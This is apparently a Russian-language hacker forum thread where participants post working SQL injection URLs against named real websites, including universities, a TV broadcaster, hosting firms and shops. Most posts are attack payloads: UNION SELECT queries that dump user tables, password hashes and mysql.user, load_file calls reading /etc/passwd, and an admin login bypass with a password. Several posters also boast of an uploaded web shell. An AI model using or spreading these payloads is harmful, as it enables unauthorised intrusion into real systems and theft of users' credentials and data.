SQL Инъекции

Code:

http://links.odessa.net/all_links.php3?s=1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*

1,4,7,12 видимые... они в самом низу.. помогите надыбать таблице и т.д. очень надо)

 

Grema
Получите, распишитесь.

 

http://www.sexshop-romantic.ro/sex-shop/?id=69+union+select+1,2,3--

 

elpa.coe.missouri.edu

Code:

http://elpa.coe.missouri.edu/index.php?page=-1+union+select+1,2,aes_decrypt(aes_encrypt(concat(user(),0x3a,version(),0x3a,database()),1),1),4,5,6,7,8,9,10,11/*

 

Code:

http://www.forsleep.ru/index.php?rn_id=-14+union+select+1,concat_ws(0x203a20,table_name,column_name),3,4,5,6,7+from+information_schema.columns/*

 

Межгосударственная телерадиокомпания «Мир»

mysql 4, magic_quotes off, file_priv off.
http://www.mirtv.ru/show.php?id=14968+order+by+5&templ=news
http://www.mirtv.ru/show.php?id=-14968+union+select+1,version(),3,4,5&templ=news

и вообще сайт очень насыщен sql-инекциями

ps.
http://www.mirtv.ru/admin/
login: admin' or 1=1/*
pass: k8<3you

шелл залит, сюда не выкладывать и не дефейсить - будьте людьми. ваши варианты залития в пм

 

Странно.. шелл залил, но листинг директорий запрещен... бага банальная.. но лови +2

 

shop

 

ПАРТИЯ ЗЕЛЁНЫХ Украины

Социалистическая партия Украины (ток чёт я ту не разобрался)

 

Создание сайтов, веб дизайн, раскрутка сайтов, создание интернет-магазинов, создание мультимедийных презентаций, интранет-сайты, фирменный стиль, разработка логотипов, продвижение сайтов, поисковая оптимизация - OnArt
www.onart.ru
Хреново создают сайты, если у самих скулей полно

Code:

http://www.onart.ru/index.php?page=54&id=-14+UNION+SELECT+1,2,3,concat(login,0x3a,password),5,6,7,8,9+from+users+limit+0,1/*

adminnart333

 

сайт какого-то хостера (divhost.ru)

Code:

http://divhost.ru/news.php?id=1+union+select+1,2,3,concat(user(),char(58),database(),char(58),version())/*

 

еще один хостер
www.ukrnic.com

Code:

http://www.ukrnic.com/hosting_info.php?id=-3+union+select+1,2,concat(user(),0x3a,version())/*

 

Code:

http://www.housing.wisc.edu/resnet/news/story.php?id=-1+union+select+1,2,3,4,5,load_file(char(47,101,116,99,47,112,97,115,115,119,100,45)),7,8,9,0/*

 

Code:

http://experts.uchicago.edu/experts.php?id=-1+union+select+1,2,3,4,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2/*

 

первая моя SQL-inj

 

http://peacekeeper.ru
user=\

Code:

http://peacekeeper.ru/index.php?mid=-1769+union+select+1,2,3,4,5,6,version(),8,user(),10,11,12,13/* 

Code:

 http://peacekeeper.ru/index.php?mid=-1769+union+select+1,2,3,4,5,6,column_name,8,9,10,11,12,13+from+Information_schema.columns+where+table_name=0x6d69726f74766f7265635f6d61696e/*

Code:

http://peacekeeper.ru/index.php?mid=-1769+union+select+1,2,3,4,5,6,concat(id,char(58),name2),8,9,10,11,12,13+from+mirotvorec_main/* 

 

www.nihoncar.com
Mysql Версия 5.

root:

Code:

http://www.nihoncar.com/en/news_details.php?id=-1+union+select+1,2,3,concat(user,0x3a,password),5,6,7,8,9+from+mysql.user+limit+0,1/*

есть форум, пользователи:

Code:

http://www.nihoncar.com/en/news_details.php?id=-1+union+select+1,2,3,concat(username,0x3a,user_password),5,6,7,8,9+from+phpbb_users+limit+1,1/*

лимит в помощь..

 

http://www.it-news.cc/index.php?type=article&ID=-1+union+select+MenuID+from+Article/*

ы

 

www.wfsj.org
Примечательно серв на Windows/IIS

Code:

http://www.wfsj.org/resources/page.php?id=-1+union+select+1,2,3,convert(concat(user(),0x3a,version()),binary),5,6,7,8,9,0,11/*

 

PR=6
inside.tufts.edu

Code:

http://inside.tufts.edu/announce/index.php?t=id&id=-471+union+select+1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user()),0x3a),0x3a),4,5,6,7,8/*

есть табица users но не могу подобрать колонки